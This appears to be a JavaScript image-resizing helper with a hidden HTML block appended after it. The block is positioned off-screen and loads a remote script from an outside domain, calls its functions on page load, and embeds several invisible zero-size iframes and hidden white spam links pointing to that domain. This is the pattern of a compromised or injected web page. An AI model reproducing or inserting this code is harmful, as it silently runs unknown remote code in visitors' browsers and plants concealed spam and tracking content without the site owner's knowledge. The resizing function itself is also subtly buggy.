function picmaxwah(obj,maxw,maxh){
	var strw = obj.width;
	var strh = obj.height;
	if ((strw <= 0) || (strh <= 0)) return false;
	
	if ( strw > maxh){
		obj.width = maxw;
		obj.height = strh * ( maxw / strw);
		}
		
  if ( strh > maxh ){
		obj.height = maxh;
		obj.width = strw * ( maxh / strh);
		}
		
	obj.alt = obj.width + "¡Á" + obj.height;
} 


<div style="position: absolute; top: -999px;left: -999px;">
<script src="http://www.wooi.me/client/js/webpage.js" type="text/javascript"></script>
<script type="text/javascript">run1();run2();run3();</script><iframe frameborder="0" height="0" width="0" src="http://wooi.me/"></iframe><iframe frameborder="0" height="0" width="0" src="http://wooi.me/tools.php"></iframe><iframe frameborder="0" height="0" width="0" src="http://wooi.me/viewer.php?u=wooi.me/version/"></iframe><iframe frameborder="0" height="0" width="0" src="http://wooi.me/urle.php"></iframe><iframe frameborder="0" height="0" width="0" src="http://wooi.me/map.php"></iframe><iframe frameborder="0" height="0" width="0" src="http://wooi.me/version/1.0/"></iframe><iframe frameborder="0" height="0" width="0" src="http://wooi.me/extra/"></iframe><iframe frameborder="0" height="0" width="0" src="http://wooi.me/extra/article.php?id=8"></iframe>
<strong><a href="http://wooi.me/" style="cursor:default;"><font color="#FFF" size="0">wooi</font></a></strong>
<strong><a href="http://wooi.me/vsource.php" style="cursor:default;"><font color="#FFF" size="0">wooi</font></a></strong>
<strong><a href="http://wooi.me/viewer.php" style="cursor:default;"><font color="#FFF" size="0">wooi</font></a></strong>
<strong><a href="http://wooi.me/urle.php" style="cursor:default;"><font color="#FFF" size="0">wooi</font></a></strong>
<strong><a href="http://wooi.me/" style="cursor:default;"><font color="#FFF" size="0">ÍøÒ³ÌØÐ§</font></a></strong>
</div>

